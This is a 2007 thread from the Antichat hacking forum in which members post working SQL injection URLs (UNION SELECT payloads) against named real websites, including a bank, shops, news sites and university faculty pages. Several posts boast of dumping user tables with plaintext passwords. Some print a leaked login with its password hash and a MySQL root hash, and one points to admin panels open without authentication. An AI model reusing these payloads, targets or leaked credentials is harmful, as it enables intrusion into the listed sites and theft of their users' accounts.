HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 12.03.2007, 18:13
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами: 10309346

Репутация: 4303


По умолчанию

ООО КБ "Эргобанк"
Цитата:
http://www.ergobank.ru/root/news/newsGen.php?id=-3+union+select+1,2,convert(version()+using+latin1)
 
Ответить с цитированием

  #2  
Старый 12.03.2007, 18:14
Colkru
Участник форума
Регистрация: 13.01.2007
Сообщений: 160
С нами: 10170610

Репутация: 181
По умолчанию

Цитата:
http://hightower.fmp.com/weblogitem.php?id=-1+union+select+concat(username,char(58),password), 2,3,4,5,6+from+user+limit+0,1/*
Пассы в чистом виде)

Цитата:
http://dety.info/region.php?id=-1+union+select+1,2,concat(user,char(58),password), 4,5,6+from+user+limit+0,1/*
хе, и логин и пароль admin, правда в админку (http://dety.info/admin) с таким логином и паролем не попадеш.

Последний раз редактировалось Colkru; 12.03.2007 в 18:29..
 
Ответить с цитированием

  #3  
Старый 12.03.2007, 18:35
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами: 10483586

Репутация: 5826


По умолчанию

Код:
http://www.krasota.ru/krasota/news/show.htpl?id=-1+union+select+1,2,3,4,5,concat(database(),char(58),user(),char(58),version()),7,8,9,10,11,12,13/*
Код:
http://www.sibinfo.org/forma.php?classid=-1+union+select+concat(database(),char(58),user(),char(58),version())/*
 
Ответить с цитированием

  #4  
Старый 12.03.2007, 18:45
Colkru
Участник форума
Регистрация: 13.01.2007
Сообщений: 160
С нами: 10170610

Репутация: 181
По умолчанию

Цитата:
http://www.livemaster.ru/blogmessage.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,concat(email,char(58),password),17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,3 9,40,41,42+from+users+limit+258,1/*
259 пользователей, пассы в чистом виде.
 
Ответить с цитированием

  #5  
Старый 12.03.2007, 18:59
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
С нами: 10160966

Репутация: 1719


По умолчанию

Код:
http://www.fortress.ru/products.php?id=-1+union+select+1,convert(concat(login,0x3a,password)+using+latin1),3,4,5,6,7,8,9,10+from+users+limit+0,1/*
alvisha:62f31c50cb2d36b5e3a7e06a5d43f48a
798 юзеров

когда нашел админку, подумал... нафиг я все это подбирал)
база юзеров, доступ без авторизации
http://www.fortress.ru/admin/users/index.php
остальное: http://www.fortress.ru/admin/
 
Ответить с цитированием

  #6  
Старый 12.03.2007, 19:38
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
С нами: 10214321

Репутация: 552
По умолчанию

ну собствено вот....

http://www.pij.org/details.php?id=-820+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28/*


http://www.onlinenews.com.pk/details.php?id=-85519+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18/*

http://www.hpcalc.org/details.php?id=-3644+union+select+1,password,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29+from+users/*

http://www.debate21.com/comic.php?id=-64+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5+from+mysql.user/*

http://physiology.case.edu/faculty.php?id=-91+union+select+1,password,3,4,5,6,7,8,9+from+mysq l.user/*

http://dma.ucla.edu/people/faculty.php?ID=-16+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16/*

http://wineserver.ucdavis.edu/people/faculty.php?id=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19/*

http://bme.rutgers.edu/faculty.php?id=-55+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat( login,char(58),password),14,15,16,17,18,19,20+from +users/*

http://www.bard.edu/academics/faculty/faculty.php?action=details&id=-217+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22/*

http://las.arts.ubc.ca/las4/faculty.php?facultyid=-115+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*

http://www.clark.edu/news_events/faculty_experts/faculty.php?id=-6+union+select+1,2,3,4,5,6,7,8,9,10,11/*
 
Ответить с цитированием

  #7  
Старый 12.03.2007, 20:18
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
С нами: 10160966

Репутация: 1719


По умолчанию

Код:
http://www.de-viz.ru/articles_view.php?articles_id=-1+union+select+1,2,3,concat(user,0x3a,password),5,6,7,8,9+from+mysql.user/*
root:67457e226a1a15bd
mysql-hash

next:

Код:
http://www.masterkit.ru/main/set.php?num=-1+union+select+1,2,3,4,5,concat(name,0x3a,pass),7,8,9,10,11,12,13,14+from+user+limit+0,1/*
122 юзера, пассы чистые

эх)

Последний раз редактировалось n1†R0x; 12.03.2007 в 20:30..
 
Ответить с цитированием

  #8  
Старый 12.03.2007, 20:31
Colkru
Участник форума
Регистрация: 13.01.2007
Сообщений: 160
С нами: 10170610

Репутация: 181
По умолчанию

Код:
http://www.dukemednews.duke.edu/gallery/detail.php?id=-1+union+select+concat(user,char(58),password),2+from+mysql.user+limit+0,1/*
Код:
http://dewerelddraaitdoor.vara.nl/jakhalzen.php?id=-1+union+select+1,2,3,version(),5,user(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*
Код:
http://avtosalon.in.ua/salon_view.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
Вот еще несколько)))
 
Ответить с цитированием

  #9  
Старый 12.03.2007, 21:13
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
С нами: 10459106

Репутация: 2996


По умолчанию

mpio

Код:
 http://www.mpio.com.ru/goods/product.php?id=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
 
Ответить с цитированием

  #10  
Старый 12.03.2007, 21:19
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
С нами: 10467686

Репутация: 930


По умолчанию

www.tas-combank.com.ua


Код:
http://www.tas-combank.com.ua/index.php?cat=8&news=-1+union+select+1,2,3,4,5,6,7,8,9/*
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.